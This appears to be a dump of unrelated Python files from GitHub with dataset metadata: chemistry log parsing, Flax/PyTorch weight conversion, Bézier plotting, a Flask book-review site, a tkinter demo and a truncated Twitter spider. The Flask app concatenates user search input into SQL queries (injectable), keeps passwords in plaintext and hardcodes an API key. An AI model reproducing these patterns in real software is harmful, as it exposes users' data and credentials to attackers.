__init__(self, path: str, readOpt=True):\n self.path = path\n self.content = {'taskTitle': '',\n 'taskMethod': '',\n 'StructureDict': [],\n 'CPUTime': {\n 'days': None,\n 'hours': None,\n 'minutes': None,\n 'seconds': None\n },\n 'NormalTerminate': False,\n 'EnergyDict': [],\n 'SpinMulti': 1,\n 'Charge': 0,\n # 'GAPDict': {\n # 'SCFAttr': [],\n # 'SCFEnergy': []\n # }\n }\n if readOpt:\n # read context from the file.\n self.readfiles()\n\n def readfiles(self):\n par_tasktitle = re.compile(\n r' -+\\n (.*?)\\n -+\\n Symbolic Z-matrix:')\n par_tasktitle_restart = re.compile(\n r' -+\\n (.*?)\\n -+\\n Structure from the checkpoint')\n par_taskmethod = re.compile(\n r' #(.*?)\\n')\n par_cputime = re.compile(\n r'Job cpu time:(.*?) days (.*?) hours (.*?) minutes (.*?) seconds.\\n', re.S)\n par_NormalTerminate = re.compile(r'Normal termination', re.S)\n par_ErrorTerminate = re.compile(r'Error termination', re.S)\n\n par_EnergyDictSCF = re.compile(r'SCF Done:.*?= {2}(.*?) {5}A.U.', re.S)\n par_StructureDictSCF = re.compile(\n r'Number {5}Number {7}Type {13}X {11}Y {11}Z\\n '\n r'---------------------------------------------------------------------\\n (.*?)\\n '\n r'---------------------------------------------------------------------',\n re.S)\n par_SpinMulti = re.compile(r'Multiplicity = (.*?)\\n')\n par_Charge = re.compile(r'Charge = (.*?) Multiplicity')\n \"\"\"\n\n Parameters\n ----------\n mode:str\n if \"all\", read every \"SCF Done\" context.\n if \"last\", read the final result.\n # TODO: More read modes.\n\n Returns\n -------\n\n \"\"\"\n with open(self.path) as file:\n str = file.read()\n self.content['taskMethod'] = par_taskmethod.findall(str)[0]\n try:\n self.content['taskTitle'] = par_tasktitle.findall(str)[0]\n except IndexError as e:\n try:\n self.content['taskTitle'] = par_tasktitle_restart.findall(str)[0]\n except IndexError as e:\n if \"restart\" in self.content['taskMethod']:\n pass\n else:\n raise e\n try:\n self.content['CPUTime']['days'], self.content['CPUTime']['hours'], self.content['CPUTime']['minutes'], \\\n self.content['CPUTime']['seconds'] = [float(i) for i in par_cputime.findall(str)[0]]\n self.content['NormalTerminate'] = (par_NormalTerminate.findall(str)[0]) != '' and (\n len(par_ErrorTerminate.findall(str)) == 0)\n except:\n raise\n self.content['EnergyDict'] = [float(i) for i in par_EnergyDictSCF.findall(str)]\n self.content['StructureDict'] = [i for i in par_StructureDictSCF.findall(str)]\n self.content['SpinMulti'] = float(par_SpinMulti.findall(str)[0])\n self.content['Charge'] = float(par_Charge.findall(str)[0])\n\n def exportcontent(self):\n \"\"\"\n\n Returns\n -------\n str:\n result summary\n\n \"\"\"\n return self.path + \"\\t\" + self.content['taskMethod'] + \"\\t\" + str(\n self.content['EnergyDict'][-1]) + '\\t' + str(self.content['NormalTerminate']) + '\\n'\n\n def get_content(self, idx):\n r\"\"\"\n\n Parameters\n ----------\n idx:int\n index of which structure in the file.\n\n Returns\n -------\n\n \"\"\"\n if self.content['NormalTerminate']:\n return {'taskTitle': self.content['taskTitle'],\n 'taskMethod': self.content['taskMethod'],\n 'StructureDict': self.content['StructureDict'][idx],\n 'EnergyDict': self.content['EnergyDict'][idx],\n 'SpinMulti': self.content['SpinMulti'],\n 'Charge': self.content['Charge'],\n }\n else:\n raise CalculationResultError(\n \"Result in `{}` seems not NormalTerminate. Please check the \"\n \"file manually.\".format(os.path.abspath(self.path))\n )\n\n def get_contents(self, idx, ignoreFail=False):\n \"\"\"\n\n Parameters\n ----------\n idx:list of int,iterable\n list of index of structure\n ignoreFail:bool\n whether to ignore fail calculation or not\n\n Returns\n -------\n\n \"\"\"\n contents = []\n if not isinstance(idx, list):\n idx = list(idx)\n for item in idx:\n try:\n contents.append(self.get_content(item))\n except CalculationResultError:\n if not ignoreFail:\n raise\n else:\n pass\n return contents\n\n def get_ase_atoms(self, idxs):\n from ase import Atoms\n AtomsList = []\n for item in idxs:\n stuc = self.get_content(item)\n symbols, positions = structureDictParser(stucDict=stuc[\"StructureDict\"])\n at = Atoms(\n numbers=symbols,\n positions=positions,\n info={\"SpinMulti\": stuc[\"SpinMulti\"],\n \"Charge\": stuc[\"Charge\"]}\n )\n AtomsList.append(at)\n return AtomsList\n\n def get_energy(self, idx):\n \"\"\"Use eV as energy unit\"\"\"\n return self.content['EnergyDict'][idx] * Hartree / eV\n\n def get_energies(self, idxs):\n \"\"\"Use eV as energy unit\"\"\"\n energies = []\n for item in idxs:\n energies.append(self.content['EnergyDict'][item] * Hartree / eV)\n return energies\n\n def get_all_pairs(self):\n r\"\"\"\n Get all Atoms:properties pairs\n\n Returns\n -------\n (ase.Atoms, list)\n\n \"\"\"\n n = len(self.content['EnergyDict'])\n ats, en = self.get_ase_atoms(range(n)), self.get_energies(range(n))\n if len(en) >= 2:\n # for opt-freq task\n if en[-1] == en[-2]:\n ats = ats[:-1]\n en = en[:-1]\n return ats, en\n\n def get_final_pairs(self):\n r\"\"\"\n Get the last Atoms:properties pairs\n often used for g16 opt task and check.\n\n Returns\n -------\n ([ase.Atoms], list)\n\n \"\"\"\n from ase.io.gaussian import read_gaussian_out\n try:\n result = ([read_gaussian_out(open(self.path, \"r\"))],\n [read_gaussian_out(open(self.path, \"r\")).get_potential_energy()]\n )\n return result\n except IndexError:\n tmp = self.get_all_pairs()\n logging.warning(\"Wrong in calling ase read, please check your files.\")\n return [tmp[0][-1]], [tmp[1][-1]]\n\n\ndef structureDictParser(stucDict):\n symbols = []\n positions = []\n for atom in stucDict.split(\"\\n\"):\n col = atom.split()\n symbols.append(int(col[1]))\n positions.append(list(float(i) for i in col[3:]))\n return symbols, positions\n\n\nif __name__ == '__main__':\n\n file = G16LogFiles(\"D:\\CODE\\PycharmProjects\\lightMolNet\\examples\\logdata\\C20_Ih_1.log\")\n all_atoms = []\n all_properties = []\n for at, en in zip(file.get_all_pairs()[0], file.get_all_pairs()[1]):\n properties = {}\n all_atoms.append(at)\n pn = \"energy_U0\"\n properties[pn] = en * Hartree / eV\n all_properties.append(properties)\n print(all_atoms[0].__dict__)\n","repo_name":"saltball/lightMolNet","sub_path":"src/lightMolNet/datasets/fileprase.py","file_name":"fileprase.py","file_ext":"py","file_size_in_byte":8604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"24353521391","text":"import os\nfrom pickle import UnpicklingError\nfrom typing import Dict, Tuple\n\nimport numpy as np\n\nimport jax\nimport jax.numpy as jnp\nimport transformers\nfrom flax.serialization import from_bytes\nfrom flax.traverse_util import flatten_dict, unflatten_dict\n\nfrom .utils import logging\n\n\nlogger = logging.get_logger(__name__)\n\n\n#####################\n# PyTorch => Flax #\n#####################\n\n\ndef load_pytorch_checkpoint_in_flax_state_dict(\n flax_model, pytorch_checkpoint_path, is_sharded, allow_missing_keys=False\n):\n \"\"\"Load pytorch checkpoints in a flax model\"\"\"\n try:\n import torch # noqa: F401\n except ImportError:\n logger.error(\n \"Loading a PyTorch model in Flax, requires both PyTorch and Flax to be installed. Please see\"\n \" https://pytorch.org/ and https://flax.readthedocs.io/en/latest/installation.html for installation\"\n \" instructions.\"\n )\n raise\n\n if not is_sharded:\n pt_path = os.path.abspath(pytorch_checkpoint_path)\n logger.info(f\"Loading PyTorch weights from {pt_path}\")\n\n pt_state_dict = torch.load(pt_path, map_location=\"cpu\")\n logger.info(f\"PyTorch checkpoint contains {sum(t.numel() for t in pt_state_dict.values()):,} parameters.\")\n\n flax_state_dict = convert_pytorch_state_dict_to_flax(pt_state_dict, flax_model)\n else:\n # model is sharded and pytorch_checkpoint_path already contains the list of .pt shard files\n flax_state_dict = convert_pytorch_sharded_state_dict_to_flax(pytorch_checkpoint_path, flax_model)\n return flax_state_dict\n\n\ndef rename_key_and_reshape_tensor(\n pt_tuple_key: Tuple[str],\n pt_tensor: np.ndarray,\n random_flax_state_dict: Dict[str, jnp.ndarray],\n model_prefix: str,\n) -> (Tuple[str], np.ndarray):\n \"\"\"Rename PT weight names to corresponding Flax weight names and reshape tensor if necessary\"\"\"\n\n def is_key_or_prefix_key_in_dict(key: Tuple[str]) -> bool:\n \"\"\"Checks if `key` of `(prefix,) + key` is in random_flax_state_dict\"\"\"\n return len(set(random_flax_state_dict) & set([key, (model_prefix,) + key])) > 0\n\n # layer norm\n renamed_pt_tuple_key = pt_tuple_key[:-1] + (\"scale\",)\n if pt_tuple_key[-1] in [\"weight\", \"gamma\"] and is_key_or_prefix_key_in_dict(renamed_pt_tuple_key):\n return renamed_pt_tuple_key, pt_tensor\n\n # embedding\n renamed_pt_tuple_key = pt_tuple_key[:-1] + (\"embedding\",)\n if pt_tuple_key[-1] == \"weight\" and is_key_or_prefix_key_in_dict(renamed_pt_tuple_key):\n return renamed_pt_tuple_key, pt_tensor\n\n # conv layer\n renamed_pt_tuple_key = pt_tuple_key[:-1] + (\"kernel\",)\n if pt_tuple_key[-1] == \"weight\" and pt_tensor.ndim == 4 and not is_key_or_prefix_key_in_dict(pt_tuple_key):\n pt_tensor = pt_tensor.transpose(2, 3, 1, 0)\n return renamed_pt_tuple_key, pt_tensor\n\n # linear layer\n renamed_pt_tuple_key = pt_tuple_key[:-1] + (\"kernel\",)\n if pt_tuple_key[-1] == \"weight\" and not is_key_or_prefix_key_in_dict(pt_tuple_key):\n pt_tensor = pt_tensor.T\n return renamed_pt_tuple_key, pt_tensor\n\n # old PyTorch layer norm weight\n renamed_pt_tuple_key = pt_tuple_key[:-1] + (\"weight\",)\n if pt_tuple_key[-1] == \"gamma\":\n return renamed_pt_tuple_key, pt_tensor\n\n # old PyTorch layer norm bias\n renamed_pt_tuple_key = pt_tuple_key[:-1] + (\"bias\",)\n if pt_tuple_key[-1] == \"beta\":\n return renamed_pt_tuple_key, pt_tensor\n\n return pt_tuple_key, pt_tensor\n\n\ndef convert_pytorch_state_dict_to_flax(pt_state_dict, flax_model):\n # convert pytorch tensor to numpy\n pt_state_dict = {k: v.numpy() for k, v in pt_state_dict.items()}\n\n model_prefix = flax_model.base_model_prefix\n random_flax_state_dict = flatten_dict(flax_model.params)\n flax_state_dict = {}\n\n load_model_with_head_into_base_model = (model_prefix not in flax_model.params) and (\n model_prefix in set([k.split(\".\")[0] for k in pt_state_dict.keys()])\n )\n load_base_model_into_model_with_head = (model_prefix in flax_model.params) and (\n model_prefix not in set([k.split(\".\")[0] for k in pt_state_dict.keys()])\n )\n\n # Need to change some parameters name to match Flax names\n for pt_key, pt_tensor in pt_state_dict.items():\n\n pt_tuple_key = tuple(pt_key.split(\".\"))\n\n # remove base model prefix if necessary\n has_base_model_prefix = pt_tuple_key[0] == model_prefix\n if load_model_with_head_into_base_model and has_base_model_prefix:\n pt_tuple_key = pt_tuple_key[1:]\n\n # Correctly rename weight parameters\n flax_key, flax_tensor = rename_key_and_reshape_tensor(\n pt_tuple_key, pt_tensor, random_flax_state_dict, model_prefix\n )\n\n # add model prefix if necessary\n require_base_model_prefix = (model_prefix,) + flax_key in random_flax_state_dict\n if load_base_model_into_model_with_head and require_base_model_prefix:\n flax_key = (model_prefix,) + flax_key\n\n if flax_key in random_flax_state_dict:\n if flax_tensor.shape != random_flax_state_dict[flax_key].shape:\n raise ValueError(\n f\"PyTorch checkpoint seems to be incorrect. Weight {pt_key} was expected to be of shape \"\n f\"{random_flax_state_dict[flax_key].shape}, but is {flax_tensor.shape}.\"\n )\n\n # also add unexpected weight so that warning is thrown\n flax_state_dict[flax_key] = jnp.asarray(flax_tensor)\n\n return unflatten_dict(flax_state_dict)\n\n\n############################\n# Sharded Pytorch => Flax #\n############################\n\n\ndef convert_pytorch_sharded_state_dict_to_flax(shard_filenames, flax_model):\n import torch\n\n # Load the index\n flax_state_dict = {}\n for shard_file in shard_filenames:\n # load using msgpack utils\n pt_state_dict = torch.load(shard_file)\n pt_state_dict = {k: v.numpy() for k, v in pt_state_dict.items()}\n\n model_prefix = flax_model.base_model_prefix\n random_flax_state_dict = flatten_dict(flax_model.params)\n\n load_model_with_head_into_base_model = (model_prefix not in flax_model.params) and (\n model_prefix in set([k.split(\".\")[0] for k in pt_state_dict.keys()])\n )\n load_base_model_into_model_with_head = (model_prefix in flax_model.params) and (\n model_prefix not in set([k.split(\".\")[0] for k in pt_state_dict.keys()])\n )\n # Need to change some parameters name to match Flax names\n for pt_key, pt_tensor in pt_state_dict.items():\n\n pt_tuple_key = tuple(pt_key.split(\".\"))\n\n # remove base model prefix if necessary\n has_base_model_prefix = pt_tuple_key[0] == model_prefix\n if load_model_with_head_into_base_model and has_base_model_prefix:\n pt_tuple_key = pt_tuple_key[1:]\n\n # Correctly rename weight parameters\n flax_key, flax_tensor = rename_key_and_reshape_tensor(\n pt_tuple_key, pt_tensor, random_flax_state_dict, model_prefix\n )\n # add model prefix if necessary\n require_base_model_prefix = (model_prefix,) + flax_key in random_flax_state_dict\n if load_base_model_into_model_with_head and require_base_model_prefix:\n flax_key = (model_prefix,) + flax_key\n\n if flax_key in random_flax_state_dict:\n if flax_tensor.shape != random_flax_state_dict[flax_key].shape:\n raise ValueError(\n f\"PyTorch checkpoint seems to be incorrect. Weight {pt_key} was expected to be of shape \"\n f\"{random_flax_state_dict[flax_key].shape}, but is {flax_tensor.shape}.\"\n )\n\n # also add unexpected weight so that warning is thrown\n flax_state_dict[flax_key] = jnp.asarray(flax_tensor)\n return unflatten_dict(flax_state_dict)\n\n\n#####################\n# Flax => PyTorch #\n#####################\n\n\ndef load_flax_checkpoint_in_pytorch_model(model, flax_checkpoint_path):\n \"\"\"Load flax checkpoints in a PyTorch model\"\"\"\n flax_checkpoint_path = os.path.abspath(flax_checkpoint_path)\n logger.info(f\"Loading Flax weights from {flax_checkpoint_path}\")\n\n # import correct flax class\n flax_cls = getattr(transformers, \"Flax\" + model.__class__.__name__)\n\n # load flax weight dict\n with open(flax_checkpoint_path, \"rb\") as state_f:\n try:\n flax_state_dict = from_bytes(flax_cls, state_f.read())\n except UnpicklingError:\n raise EnvironmentError(f\"Unable to convert {flax_checkpoint_path} to Flax deserializable object. \")\n\n return load_flax_weights_in_pytorch_model(model, flax_state_dict)\n\n\ndef load_flax_weights_in_pytorch_model(pt_model, flax_state):\n \"\"\"Load flax checkpoints in a PyTorch model\"\"\"\n\n try:\n import torch # noqa: F401\n except ImportError:\n logger.error(\n \"Loading a Flax weights in PyTorch, requires both PyTorch and Flax to be installed. Please see\"\n \" https://pytorch.org/ and https://flax.readthedocs.io/en/latest/installation.html for installation\"\n \" instructions.\"\n )\n raise\n\n # check if we have bf16 weights\n is_type_bf16 = flatten_dict(jax.tree_util.tree_map(lambda x: x.dtype == jnp.bfloat16, flax_state)).values()\n if any(is_type_bf16):\n # convert all weights to fp32 if the are bf16 since torch.from_numpy can-not handle bf16\n # and bf16 is not fully supported in PT yet.\n logger.warning(\n \"Found ``bfloat16`` weights in Flax model. Casting all ``bfloat16`` weights to ``float32`` \"\n \"before loading those in PyTorch model.\"\n )\n flax_state = jax.tree_util.tree_map(\n lambda params: params.astype(np.float32) if params.dtype == jnp.bfloat16 else params, flax_state\n )\n\n flax_state_dict = flatten_dict(flax_state)\n pt_model_dict = pt_model.state_dict()\n\n load_model_with_head_into_base_model = (pt_model.base_model_prefix in flax_state) and (\n pt_model.base_model_prefix not in set([k.split(\".\")[0] for k in pt_model_dict.keys()])\n )\n load_base_model_into_model_with_head = (pt_model.base_model_prefix not in flax_state) and (\n pt_model.base_model_prefix in set([k.split(\".\")[0] for k in pt_model_dict.keys()])\n )\n\n # keep track of unexpected & missing keys\n unexpected_keys = []\n missing_keys = set(pt_model_dict.keys())\n\n for flax_key_tuple, flax_tensor in flax_state_dict.items():\n has_base_model_prefix = flax_key_tuple[0] == pt_model.base_model_prefix\n require_base_model_prefix = \".\".join((pt_model.base_model_prefix,) + flax_key_tuple) in pt_model_dict\n\n # adapt flax_key to prepare for loading from/to base model only\n if load_model_with_head_into_base_model and has_base_model_prefix:\n flax_key_tuple = flax_key_tuple[1:]\n elif load_base_model_into_model_with_head and require_base_model_prefix:\n flax_key_tuple = (pt_model.base_model_prefix,) + flax_key_tuple\n\n # rename flax weights to PyTorch format\n if flax_key_tuple[-1] == \"kernel\" and flax_tensor.ndim == 4 and \".\".join(flax_key_tuple) not in pt_model_dict:\n # conv layer\n flax_key_tuple = flax_key_tuple[:-1] + (\"weight\",)\n flax_tensor = jnp.transpose(flax_tensor, (3, 2, 0, 1))\n elif flax_key_tuple[-1] == \"kernel\" and \".\".join(flax_key_tuple) not in pt_model_dict:\n # linear layer\n flax_key_tuple = flax_key_tuple[:-1] + (\"weight\",)\n flax_tensor = flax_tensor.T\n elif flax_key_tuple[-1] in [\"scale\", \"embedding\"]:\n flax_key_tuple = flax_key_tuple[:-1] + (\"weight\",)\n\n flax_key = \".\".join(flax_key_tuple)\n\n if flax_key in pt_model_dict:\n if flax_tensor.shape != pt_model_dict[flax_key].shape:\n raise ValueError(\n f\"Flax checkpoint seems to be incorrect. Weight {flax_key_tuple} was expected \"\n f\"to be of shape {pt_model_dict[flax_key].shape}, but is {flax_tensor.shape}.\"\n )\n else:\n # add weight to pytorch dict\n flax_tensor = np.asarray(flax_tensor) if not isinstance(flax_tensor, np.ndarray) else flax_tensor\n pt_model_dict[flax_key] = torch.from_numpy(flax_tensor)\n # remove from missing keys\n missing_keys.remove(flax_key)\n else:\n # weight is not expected by PyTorch model\n unexpected_keys.append(flax_key)\n\n pt_model.load_state_dict(pt_model_dict)\n\n # re-transform missing_keys to list\n missing_keys = list(missing_keys)\n\n if len(unexpected_keys) > 0:\n logger.warning(\n \"Some weights of the Flax model were not used when initializing the PyTorch model\"\n f\" {pt_model.__class__.__name__}: {unexpected_keys}\\n- This IS expected if you are initializing\"\n f\" {pt_model.__class__.__name__} from a Flax model trained on another task or with another architecture\"\n \" (e.g. initializing a BertForSequenceClassification model from a FlaxBertForPreTraining model).\\n- This\"\n f\" IS NOT expected if you are initializing {pt_model.__class__.__name__} from a Flax model that you expect\"\n \" to be exactly identical (e.g. initializing a BertForSequenceClassification model from a\"\n \" FlaxBertForSequenceClassification model).\"\n )\n else:\n logger.warning(f\"All Flax model weights were used when initializing {pt_model.__class__.__name__}.\\n\")\n if len(missing_keys) > 0:\n logger.warning(\n f\"Some weights of {pt_model.__class__.__name__} were not initialized from the Flax model and are newly\"\n f\" initialized: {missing_keys}\\nYou should probably TRAIN this model on a down-stream task to be able to\"\n \" use it for predictions and inference.\"\n )\n else:\n logger.warning(\n f\"All the weights of {pt_model.__class__.__name__} were initialized from the Flax model.\\n\"\n \"If your task is similar to the task the model of the checkpoint was trained on, \"\n f\"you can already use {pt_model.__class__.__name__} for predictions without further training.\"\n )\n\n return pt_model\n","repo_name":"FMInference/FlexGen","sub_path":"benchmark/third_party/transformers/src/transformers/modeling_flax_pytorch_utils.py","file_name":"modeling_flax_pytorch_utils.py","file_ext":"py","file_size_in_byte":14386,"program_lang":"python","lang":"en","doc_type":"code","stars":8687,"dataset":"github-code","pt":"7"} +{"seq_id":"36140778542","text":"from numpy import *\nfrom matplotlib.pyplot import *\nrcParams['figure.figsize'] = 8, 4\n\n\nclass RationalCasteljau:\n def __init__(self, pts):\n self.b = pts; self.n = len(pts)-1\n self.domain = (min(pts[:, 0]), max(pts[:, 0]))\n\n def run(self):\n points, weights = self.b, self.weights\n\n c1 = lambda t: (self.domain[-1] - t)/self.domain[-1]\n\n c2 = lambda t: (t - self.domain[0])/(self.domain[-1]\n - self.domain[0])\n\n\n def w(i, p):\n if p == 0: return lambda _: weights[i]\n\n return lambda t: c1(t)*w(i, p-1)(t) + c2(t)*w(i+1, p-1)(t)\n\n def N(i:'iter', p:'degree') -> 'func':\n if p == 0: return lambda _: points[i, :]\n\n return lambda t: (c1(t)*w(i, p-1)(t)*N(i, p-1)(t)\n + c2(t)*w(i+1, p-1)(t)*N(i+1, p-1)(t))\\\n /w(i, p)(t)\n\n return N(0, self.n)\n\n\n def eval(self, w, color='k', alpha=1, env=False):\n self.weights = w\n\n basis = self.run()\n sample = linspace(self.domain[0], self.domain[-1], 100)\n\n y = array(list(basis(x) for x in sample))\n plot(y[:, 0], y[:, 1], c=color, alpha=alpha)\n if env==True:\n for arg in self.b: scatter(*arg, c=color)\n plot(self.b[:, 0], self.b[:, 1], alpha = 0.2, c='k')\n\n\nif __name__=='__main__':\n #pts = array([[0, 0], [0.2, 0.5], [0.6, -0.2], [1, 0]])\n pts = array([ [0,0], [4,3], [3,1], [5,1] ])\n weights = array([1, 2, 3, 4])\n C = RationalCasteljau(pts)\n C.eval(weights, color='k', env=True)\n\n for J in range(1,10):\n J = 1/J\n weights = array([1, 2, 3, J])\n A = RationalCasteljau(pts)\n A.eval(weights, color='r', alpha=0.3)\n for J in range(1, 10):\n J = -1/J\n weights = array([1, J, 3, 4])\n A = RationalCasteljau(pts)\n #A.eval(weights, color='b', alpha=0.3)\n\n grid()\n #savefig('prob1.pdf')\n show()\n\n","repo_name":"niklasinde/CAGD","sub_path":"project5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7421838258","text":"import os\nimport requests\nimport json\nfrom flask import Flask, session, render_template, request, flash, redirect, url_for, jsonify\nfrom flask_session import Session\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\napp = Flask(__name__)\nsession\n# Check for environment variable\nif not os.getenv(\"DATABASE_URL\"):\n raise RuntimeError(\"DATABASE_URL is not set\")\n\n# Configure session to use filesystem\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\napp.secret_key = os.getenv('SECRET')\nSession(app)\n\n# Set up database\nengine = create_engine(os.getenv(\"DATABASE_URL\"))\ndb = scoped_session(sessionmaker(bind=engine))\n\n\n\n@app.route(\"/\")\ndef index():\n\n return render_template(\"index.html\")\n\n@app.route(\"/login\", methods = ['POST', 'GET'])\ndef login():\n username = request.form.get(\"username\")\n password = request.form.get(\"password\")\n currentUser = request.form.get(\"username\")\n if request.method == 'POST':\n if db.execute(\"SELECT *FROM users WHERE username = :username AND password = :password\",{\"username\" :username, \"password\" :password}).rowcount==0:\n return render_template(\"login.html\", message = (\"Wrong username or password\"))\n else:\n session['logged_in'] = True\n session['user_id'] = username\n return render_template(\"search.html\", username = session['user_id'])\n return render_template(\"login.html\")\n\n@app.route(\"/register\", methods = ['POST', 'GET'])\ndef signup():\n username = request.form.get(\"username\")\n password = request.form.get(\"password\")\n currentUser = request.form.get(\"username\")\n newuser = db.execute('SELECT *FROM users WHERE username = :username', {\"username\" :username})\n\n if request.method== \"POST\":\n if newuser.rowcount==1:\n return render_template('signup.html', message='User already exists!!')\n else:\n db.execute('INSERT INTO users (username, password) VALUES (:username, :password)',{\"username\": username, \"password\": password})\n db.commit()\n session['logged_in'] = True\n session['user_id'] = username\n return render_template('search.html', username = session['user_id'] ,message = \" Welcome, You are logged in!\")\n\n return render_template(\"signup.html\")\n\n\n@app.route('/search', methods=['GET','POST'])\ndef search():\n if request.method == \"POST\":\n searchQuery = request.form.get(\"searchQuery\")\n session['searchedFor'] = searchQuery\n searchResult = db.execute(\"SELECT isbn, author, title FROM books WHERE isbn iLIKE '%\"+searchQuery+\"%' OR author iLIKE '%\"+searchQuery+\"%' OR title iLIKE '%\"+searchQuery+\"%'\").fetchall()\n print(\"searchQuery\")\n\n session[\"books\"] = []\n noResult = db.execute(\"SELECT isbn, author, title FROM books WHERE isbn iLIKE '%\"+searchQuery+\"%' OR author iLIKE '%\"+searchQuery+\"%' OR title iLIKE '%\"+searchQuery+\"%'\")\n if noResult.rowcount==0:\n message = \"No result was found\"\n return render_template(\"results.html\", message = message)\n for row in searchResult:\n book = dict()\n book[\"isbn\"] = row[0]\n book[\"author\"] = row[1]\n book[\"title\" ] = row[2]\n\n session[\"books\"].append(book)\n return render_template(\"results.html\", username=session['user_id'], searchedFor=searchQuery, books=session[\"books\"])\n\n return render_template('search.html', username=session['user_id'])\n\n\n@app.route(\"/book/\", methods=['GET','POST'])\ndef book(isbn):\n book = db.execute(\"SELECT * FROM books WHERE isbn = :isbn\", {\"isbn\": isbn}).fetchone()\n book_id = db.execute(\"SELECT book_id FROM books WHERE isbn = :isbn\", {\"isbn\": isbn}).fetchone()\n session['book_id'] = book_id\n bid = book_id[0]\n username = session['user_id']\n user_id = db.execute('SELECT user_id FROM users WHERE username=:username',{'username':username}).fetchone()\n uid = user_id[0]\n \n print(uid)\n print(bid)\n if session['user_id'] is None:\n session['logged_in'] = False\n return render_template(\"login.html\", message=\"You loggin first!!\")\n if book is None:\n return render_template(\"error.html\", message=\"book does not exist\")\n if request.method == \"GET\":\n # Processing the json data\n res = requests.get(\"https://www.goodreads.com/book/review_counts.json\",\n params={\"key\": \"zDJmGLJmkc694O9VI0w0qQ\", \"isbns\": book.isbn}).json()[\"books\"][0]\n ratings_count = res[\"ratings_count\"]\n average_rating = res[\"average_rating\"]\n\n reviews = db.execute('SELECT scale, comments, users.user_id, username FROM users JOIN bookreview ON (users.user_id = bookreview.user_id) WHERE bookreview.book_id = :bid;', {'bid': bid}).fetchall()\n users = []\n \n return render_template(\"book.html\", book=book, users=users,review=reviews,\n ratings_count=ratings_count, average_rating=average_rating, username=session[\"user_id\"])\n if request.method=='POST':\n rating = request.form.get('rating')\n comment= request.form.get('comment')\n if db.execute('SELECT * from bookreview where user_id=:uid AND book_id=:bid',{\"uid\":uid, 'bid':bid}).rowcount==1:\n return render_template('error.html', message='You cannot submit a review twice for the same book, Please go back to the previous page')\n else:\n db.execute('insert into bookreview (user_id,book_id,scale,comments) VALUES (:uid,:bid,:rating, :comment)',{'uid':uid, 'bid':bid, 'rating':rating, 'comment':comment})\n db.commit()\n return redirect(url_for('book', isbn=book.isbn))\n\n# Page for the website's API\n@app.route(\"/api/\", methods=[\"GET\"])\ndef api(isbn):\n\n bdata = db.execute(\"SELECT * FROM books WHERE isbn = :bisbn\", {\"bisbn\": isbn}).fetchone()\n if bdata is None:\n return \"No Such A Book in the Database\", 404\n bookid = db.execute(\"SELECT book_id from books where isbn =:isbn\",{\"isbn\":isbn}).fetchone()\n\n\n numOfRatings = db.execute(\"SELECT COUNT (*) FROM bookreview WHERE book_id = :book_id\", {\"book_id\": bookid.book_id}).fetchone()\n averageRating = db.execute(\"SELECT AVG (scale) FROM bookreview WHERE book_id = :book_id\", {\"book_id\": bookid.book_id}).fetchone()\n\n app.logger.debug(f'numOfRatings type is {type(numOfRatings)}, value is {numOfRatings}')\n app.logger.debug(f'averageRating type is {type(averageRating)}, value is {averageRating}')\n\n response = {}\n response['title'] = bdata.title \n response['author'] = bdata.author\n response['year'] = bdata.year\n response['isbn'] = bdata.isbn\n response['review_count'] = str(numOfRatings[0])\n response['average_score'] = '% 1.1f' % averageRating[0]\n\n json_response = json.dumps(response)\n\n return json_response, 200\n\n\n\n@app.route(\"/profile\")\ndef profile():\n flash (\"Hello, Profile!!\")\n return render_template(\"profile.html\", username= session['user_id'])\n\n@app.route(\"/logout\")\ndef logout():\n flash (\"\")\n\n session['logged_in'] = False\n return render_template(\"index.html\")\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"AliAbukar/project1-","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":7189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"43242878934","text":"import tkinter as tk\n\n#https://stackoverflow.com/questions/23482748/how-to-create-a-hyperlink-with-a-label-in-tkinter\n\nroot=tk.Tk()\nroot.title('New Window')\n\n#load the icon for the GUI \nroot.iconbitmap('./Physics_helper_logo.ico')\n\nimport webbrowser\ndef callback(url):\n webbrowser.open_new(url)\nlink1 = tk.Label(root, text=\"Google Hyperlink\", fg=\"blue\", cursor=\"hand2\")\nlink1.pack()\nlink1.bind(\"\", lambda e: callback(\"http://www.google.com\"))\n\n\n#creat the GUI\nroot.mainloop()\n\n\n","repo_name":"maxtcurie/Python_Demo","sub_path":"GUI/Web_link.py","file_name":"Web_link.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"43043732853","text":"import twurl\nimport urllib.request, urllib.error\nimport sqlite3\nimport json\n\nTWITTER_URL = 'https://api.twitter.com/1.1/friends/list.json'\nconn = sqlite3.connect('spider.sqlite')\ncur = conn.cursor()\n\ncur.execute('create table if not exists People (id integer primary key, name text unique, retrieved boolean)')\ncur.execute('create table if not exists Relations (from_id integer, to_id integer, unique(from_id, to_id))')\n\nwhile True:\n account = input('Enter account name, \\'print\\', \\'delete\\', or \\'quit\\': ')\n \n if account == 'quit': break\n\n if account == 'delete':\n account = input('Enter account to delete: ')\n cur.execute('delete from People where name=? returning id', (account, ))\n try:\n ID = cur.fetchone()[0]\n cur.execute('delete from Relations where from_id=? or to_id=?', (ID, ID))\n except:\n print('No account with that name')\n continue\n\n if account == 'print':\n print('Data stored till now:')\n print('\\tPeople Table:')\n cur.execute('select * from People')\n for row in cur:\n print('\\t', row, sep='')\n print('\\tJoined Tables:')\n cur.execute('select * from People join Relations on People.id=Relations.from_id')\n for row in cur:\n print('\\t', row, sep='')\n continue\n\n if len(account) == 0:\n cur.execute('select id, name from People where retrieved=false limit 1')\n try:\n ID, account = cur.fetchone()\n except:\n print('All people have been retrieved')\n continue\n else:\n try:\n cur.execute('select id, retrieved from People where name=? limit 1', (account, ))\n ID, retrieved = cur.fetchone()\n if retrieved == True:\n print('Account already exists... Enter another one')\n continue\n except:\n cur.execute('insert or fail into People (name, retrieved) values (?, false)', (account, ))\n ID = cur.lastrowid\n\n url = 